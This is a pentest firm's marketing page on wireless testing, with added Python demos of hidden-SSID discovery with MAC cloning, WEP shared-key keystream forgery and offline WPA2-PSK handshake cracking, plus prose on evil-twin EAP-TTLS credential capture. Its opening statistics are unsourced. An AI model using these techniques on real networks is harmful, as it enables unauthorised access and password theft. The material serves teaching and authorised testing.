• Did you know that most organizations still run IIS 6 and 7, which are vulnerable to public exploits?

• Did you know that 90% of organizations never update Java because of application dependencies?

• Did you know that 95% of organizations have never thought of updating the Flash plugin installed in their browsers?

• Did you know that 65% of organizations still use 123456 as a password?

• Are you aware that local administrator credentials can be dumped from end-user systems and reused against other hosts with Pass-the-Hash (PtH) attacks, without the password ever being cracked?

• Did you know that most organizations have not configured NTP on their network devices, so their audit logs carry unsynchronized timestamps and the attack trail is hard to reconstruct?

• Did you know that most organizations have not fine-tuned their web gateways / IDS / IPS to get the best results?

Wireless Penetration Testing

"Wireless networks are an extension of your organization’s infrastructure perimeter and should be tested thoroughly. An insecure wireless network opens up your organization’s doors to the external world and poses a security risk. Rogue access points, installed by employees on the infrastructure, which do not follow the organization’s security guidelines, can also be used to compromise your organization. Defenseroot Consulting conducts a mix of black box and white box testing. We start by completing a site survey, where we use high powered wireless equipment to locate access points. Thereafter, we simulate multiple real-world hacking scenarios to break into the wireless network and then verify whether the internal segmentation and access controls are adequately implemented to ensure that a guest user connecting to a wireless network cannot connect to an internal wired LAN."


Here we will find the SSID of networks configured not to broadcast it (hidden SSID). We will first look at how hidden SSIDs work: the access point still sends beacon frames, but with an empty or null-filled SSID element, so a hidden network is still visible as a BSSID. Then we will explore both passive techniques (waiting for a legitimate client's probe response or association request, which always carry the real SSID) and active techniques (deauthenticating a connected client so that it reveals the SSID when it reconnects) to discover the SSID of a hidden network.

We will bypass MAC-based filters applied on access points. MAC filters are an access-control feature added by the AP software and are not part of the 802.11 security standard; client MAC addresses travel unencrypted in every frame header, so the filter is trivially bypassed. We will determine whether a MAC filter is present on the access point, read an authorized client's MAC address from captured traffic, and finally clone that MAC to successfully authenticate and associate with the access point.
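As an added example (not part of the original page or Defenseroot's own tooling), the following Python script shows the passive side of the two techniques above: it parses 802.11 management and data frame headers from a constructed capture, flags a BSSID whose beacon carries an empty SSID element, recovers the real name from a later probe response, lists the client MACs seen talking to that BSSID, and prints the Linux ip link commands that clone one of them. The BSSIDs, client MACs, SSIDs and the interface name are made up for the illustration.

```python
import struct

# IEEE 802.11 frame-control values (type in bits 2-3 of byte 0, subtype in bits 4-7)
MGMT, DATA = 0, 2
PROBE_REQ, PROBE_RESP, BEACON = 4, 5, 8
BROADCAST = b"\xff" * 6


def mac(text):
    return bytes.fromhex(text.replace(":", ""))


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def frame_control(ftype, subtype, to_ds=False, from_ds=False):
    return bytes([(subtype << 4) | (ftype << 2), int(to_ds) | (int(from_ds) << 1)])


def mgmt_frame(subtype, bssid, elements, dst=BROADCAST):
    """Beacon / probe response: 24-byte header, 12 fixed bytes, then tagged elements (id, len, value)."""
    header = frame_control(MGMT, subtype) + b"\x00\x00" + dst + bssid + bssid + b"\x00\x00"
    fixed = struct.pack("<QHH", 0, 100, 0x0411)  # timestamp, beacon interval, capability info
    tagged = b"".join(bytes([eid, len(val)]) + val for eid, val in elements)
    return header + fixed + tagged


def data_frame(client, bssid, to_ds):
    """Data frame; the meaning of the three addresses depends on the To-DS / From-DS flags."""
    if to_ds:   # station -> AP: Addr1 = BSSID, Addr2 = source (client), Addr3 = destination
        addrs = bssid + client + BROADCAST
    else:       # AP -> station: Addr1 = destination (client), Addr2 = BSSID, Addr3 = source
        addrs = client + bssid + BROADCAST
    return frame_control(DATA, 0, to_ds, not to_ds) + b"\x00\x00" + addrs + b"\x00\x00" + b"data"


def ssid_element(body):
    """Walk the tagged elements after the fixed fields. Returns the SSID, or None when the
    element is absent, zero-length or null-filled, which is how a hidden SSID looks in a beacon."""
    i = 12
    while i + 2 <= len(body):
        eid, length = body[i], body[i + 1]
        value = body[i + 2:i + 2 + length]
        if eid == 0:
            if length == 0 or value == b"\x00" * length:
                return None
            return value.decode("utf-8", "replace")
        i += 2 + length
    return None


def discover(frames):
    """Passive survey over captured frames: BSSID -> SSID, hidden flag, associated client MACs."""
    nets = {}

    def entry(bssid):
        return nets.setdefault(bssid, {"ssid": None, "hidden": False, "clients": set()})

    for raw in frames:
        ftype, subtype = (raw[0] >> 2) & 3, raw[0] >> 4
        to_ds, from_ds = bool(raw[1] & 1), bool(raw[1] & 2)
        a1, a2, a3, body = raw[4:10], raw[10:16], raw[16:22], raw[24:]
        if ftype == MGMT and subtype in (BEACON, PROBE_RESP):
            net = entry(mac_str(a3))
            ssid = ssid_element(body)
            if subtype == BEACON and ssid is None:
                net["hidden"] = True      # the AP still beacons, just without its name
            elif ssid is not None:
                net["ssid"] = ssid        # probe responses always carry the real SSID
        elif ftype == DATA and (to_ds or from_ds):
            bssid, client = (a1, a2) if to_ds else (a2, a1)
            if not client[0] & 1:         # ignore broadcast/multicast addresses
                entry(mac_str(bssid))["clients"].add(mac_str(client))
    return nets


def clone_mac_commands(iface, client_mac):
    """Linux commands to take over an authorized client's MAC (returned, not executed)."""
    return [f"ip link set dev {iface} down",
            f"ip link set dev {iface} address {client_mac}",
            f"ip link set dev {iface} up"]


# Constructed capture (not real traffic): one hidden network, one visible network, two clients.
AP1, AP2 = mac("00:11:22:33:44:55"), mac("66:77:88:99:aa:bb")
C1, C2 = mac("aa:bb:cc:dd:ee:01"), mac("aa:bb:cc:dd:ee:02")
SAMPLE_FRAMES = [
    mgmt_frame(BEACON, AP1, [(0, b"")]),                       # hidden: empty SSID element
    mgmt_frame(BEACON, AP2, [(0, b"Guest")]),
    data_frame(C1, AP1, to_ds=True),
    mgmt_frame(PROBE_RESP, AP1, [(0, b"CorpWiFi")], dst=C1),  # reply to C1's probe leaks the name
    data_frame(C2, AP1, to_ds=False),
]

if __name__ == "__main__":
    for bssid, net in discover(SAMPLE_FRAMES).items():
        print(bssid, net)
    print("\n".join(clone_mac_commands("wlan0", "aa:bb:cc:dd:ee:01")))
```

On a live engagement the frames come from a monitor-mode interface; the active variant simply injects a deauthentication frame at one of the listed clients and waits for its reconnection, after which the same parser sees the probe response. Clone a MAC only while its owner is off the air, or the AP will see two stations with the same address.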

We will attack the WLAN authentication schemes defined in 802.11: Open System and Shared Key Authentication. Here we will break Shared Key Authentication (SKA). SKA requires WEP and is fundamentally flawed: the access point sends a plaintext challenge and the client returns the same challenge WEP-encrypted, so anyone observing the exchange can XOR the two to recover an RC4 keystream for that IV and then authenticate with it, without ever knowing the WEP key.
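The keystream recovery described above, as an added example (illustrative code, not the page's or any vendor's) using a toy WEP built from RC4 and CRC-32 in pure Python. The WEP key, IV and the 128-byte challenges are arbitrary; the point is that the attacker's forged frame is accepted although the attacker never touches the key.

```python
import os
import zlib


def rc4(key, length):
    """Plain RC4 keystream generator (WEP keys RC4 with IV || secret key)."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def icv(data):
    return zlib.crc32(data).to_bytes(4, "little")   # WEP integrity check value: CRC-32


def wep_encrypt(wep_key, iv, plaintext):
    """What a legitimate client sends as SKA frame 3: IV || RC4(IV||key) XOR (challenge||ICV)."""
    return iv + xor(plaintext + icv(plaintext), rc4(iv + wep_key, len(plaintext) + 4))


class AccessPoint:
    """SKA verifier: sends a 128-byte challenge (frame 2) and checks the encrypted reply (frame 3)."""

    def __init__(self, wep_key):
        self.wep_key = wep_key
        self.current = None

    def challenge(self):
        self.current = os.urandom(128)
        return self.current

    def verify(self, frame):
        iv, body = frame[:3], frame[3:]
        plain = xor(body, rc4(iv + self.wep_key, len(body)))
        text, tag = plain[:-4], plain[-4:]
        return text == self.current and tag == icv(text)


def recover_keystream(challenge, response_frame):
    """Attacker: challenge (plaintext, frame 2) XOR ciphertext (frame 3) = keystream for that IV."""
    iv, body = response_frame[:3], response_frame[3:]
    return iv, xor(challenge + icv(challenge), body)


def forge_response(iv, keystream, new_challenge):
    """Attacker: reuse the recovered IV and keystream on a fresh challenge. No key needed."""
    return iv + xor(new_challenge + icv(new_challenge), keystream)


def demo(wep_key=b"\x0b\xad\xc0\xff\xee", iv=b"\x00\x00\x01"):
    ap = AccessPoint(wep_key)

    # 1. A legitimate client authenticates; the attacker sniffs frames 2 and 3.
    chal = ap.challenge()
    legit = wep_encrypt(wep_key, iv, chal)
    legit_ok = ap.verify(legit)
    sniffed_iv, keystream = recover_keystream(chal, legit)

    # 2. The attacker starts its own SKA exchange and answers with a forged frame 3.
    new_chal = ap.challenge()
    forged_ok = ap.verify(forge_response(sniffed_iv, keystream, new_chal))
    return legit_ok, forged_ok, keystream


if __name__ == "__main__":
    legit_ok, forged_ok, _ = demo()
    print(f"legitimate client accepted: {legit_ok}, attacker without key accepted: {forged_ok}")
```

The 132 recovered keystream bytes (128 for the challenge plus 4 for the ICV) are exactly what a real tool keeps in its .xor file; because WEP lets the sender pick the IV, the same IV and keystream can be replayed against the AP indefinitely, which is why the recommendation for WEP networks is to migrate rather than tune.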

We will crack WPA2-PSK by capturing the 4-way handshake. The Key Information field of the EAPOL-Key frames tells us which MIC and key-wrap algorithms are in use (the key descriptor version); with that, we derive a candidate PMK from each dictionary passphrase and the SSID, expand it to the PTK using both MAC addresses and both nonces, recompute the MIC over message 2 and compare it with the captured one. A match reveals the passphrase, entirely offline.
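An added worked example of that offline attack (not from the original page), in Python using only the standard library. The handshake here is constructed by the script itself from a known passphrase rather than captured from the air, and the MAC addresses, nonces and SSID are hypothetical; the MIC algorithm is selected from the key descriptor version in the Key Information field (HMAC-MD5 for version 1, HMAC-SHA1-128 for version 2; version 3's AES-128-CMAC is left unimplemented because it needs a CMAC library).

```python
import hashlib
import hmac
import struct

# EAPOL hdr(4) + descriptor type(1) + key info(2) + key len(2) + replay(8) + nonce(32) + IV(16) + RSC(8) + ID(8)
MIC_OFFSET = 81


def pmk_from_passphrase(passphrase, ssid):
    """PSK -> PMK: PBKDF2-HMAC-SHA1, 4096 rounds, salted with the SSID."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk(pmk, aa, spa, anonce, snonce):
    """802.11i PRF-512 over both MACs and both nonces; the first 16 bytes are the KCK."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b"".join(hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
                   for i in range(4))
    return out[:64]


def eapol_key_frame(key_info, nonce, mic=bytes(16)):
    """Constructed EAPOL-Key (RSN descriptor) frame with empty Key Data, as in handshake message 2."""
    body = (b"\x02" + struct.pack(">HHQ", key_info, 16, 1) + nonce
            + bytes(16) + bytes(8) + bytes(8) + mic + struct.pack(">H", 0))
    return b"\x01\x03" + struct.pack(">H", len(body)) + body


def compute_mic(kck, eapol):
    """MIC over the frame with its MIC field zeroed; the algorithm comes from the
    Key Descriptor Version in the low 3 bits of Key Information."""
    version = struct.unpack(">H", eapol[5:7])[0] & 0x7
    zeroed = eapol[:MIC_OFFSET] + bytes(16) + eapol[MIC_OFFSET + 16:]
    if version == 1:                       # HMAC-MD5 (TKIP / RC4 key wrap)
        return hmac.new(kck, zeroed, hashlib.md5).digest()
    if version == 2:                       # HMAC-SHA1-128 (CCMP / AES key wrap)
        return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]
    raise NotImplementedError("version 3 uses AES-128-CMAC; not in the standard library")


def make_capture(passphrase, ssid, aa, spa, anonce, snonce, key_info=0x010A):
    """Client side: build message 2 of the 4-way handshake as an attacker would sniff it.
    key_info 0x010A = MIC bit | Pairwise bit | descriptor version 2."""
    kck = ptk(pmk_from_passphrase(passphrase, ssid), aa, spa, anonce, snonce)[:16]
    mic = compute_mic(kck, eapol_key_frame(key_info, snonce))
    return {"ssid": ssid, "aa": aa, "spa": spa, "anonce": anonce, "snonce": snonce,
            "eapol": eapol_key_frame(key_info, snonce, mic)}


def crack(capture, wordlist):
    """Offline dictionary attack: derive PMK -> KCK per candidate, recompute the MIC, compare."""
    target = capture["eapol"][MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, capture["ssid"])
        kck = ptk(pmk, capture["aa"], capture["spa"], capture["anonce"], capture["snonce"])[:16]
        if hmac.compare_digest(compute_mic(kck, capture["eapol"]), target):
            return candidate
    return None


# Constructed handshake (not a real capture): hypothetical addresses, fixed nonces.
AA, SPA = bytes.fromhex("001122334455"), bytes.fromhex("aabbccddee01")
ANONCE, SNONCE = bytes(range(32)), bytes(range(32, 64))
CAPTURE = make_capture("letmein123", "CorpWiFi", AA, SPA, ANONCE, SNONCE)

if __name__ == "__main__":
    print(crack(CAPTURE, ["123456", "password", "letmein123"]))
```

The PMK derivation can be checked against the IEEE 802.11i Annex H test vector (passphrase "password", SSID "IEEE" gives PMK f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e). The 4096 PBKDF2 rounds per candidate are the only thing slowing the attacker down, which is why passphrase length, not the cipher, decides how long a WPA2-PSK network survives.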

Here we will verify how EAP-TTLS-based authentication is just as susceptible to certificate spoofing attacks as PEAP when clients do not validate the RADIUS server certificate. We will use different inner authentication protocols with EAP-TTLS (MSCHAPv2, MSCHAP, CHAP, PAP) and see whether an attacker running a honeypot access point with a spoofed certificate can capture the inner exchange and recover the client password: with PAP the password arrives in the clear inside the tunnel, while the challenge/response methods yield material that can be cracked offline.